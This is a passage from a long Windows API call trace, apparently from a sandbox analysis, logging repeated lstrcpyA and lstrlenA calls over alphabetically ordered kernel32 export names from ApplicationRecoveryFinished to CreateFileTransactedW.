lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.465] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.465] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.465] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.465] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.465] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.466] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.466] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.466] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.466] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.466] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.466] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.466] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.466] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.466] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.466] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.466] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.466] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.466] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.466] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.466] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.466] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.466] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.466] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.466] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.467] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.467] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.467] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.467] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.467] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.467] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.467] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.467] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.467] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.467] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.467] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.467] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.467] lstrlenA (lpString="BEEP") returned 4 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.467] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.467] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.467] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.467] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.467] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.468] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.468] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.468] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.468] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.468] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.468] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.468] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.468] lstrlenA (lpString="CANCELIO") returned 8 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.468] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.468] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.468] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.468] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.468] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.468] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.468] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.468] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.468] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.468] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.469] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.469] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.469] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.469] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.469] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.469] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.469] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.469] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.469] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.469] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.469] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.469] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.469] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.469] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.470] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.470] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.470] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.470] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.470] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.470] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.470] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.470] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.470] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.470] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.470] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.470] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.470] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.470] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.470] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.470] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.470] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.470] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.471] lstrlenA (lpString="COPYFILEA") returned 9 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.471] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.471] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.471] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.471] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.471] lstrlenA (lpString="COPYFILEW") returned 9 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.471] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.471] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.471] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.471] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.471] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.471] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.471] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.471] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.471] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.471] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.471] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.471] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.472] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.472] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.472] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.472] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.472] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.472] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.472] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.472] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.472] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.472] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.472] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.472] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.472] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.472] lstrcpyA 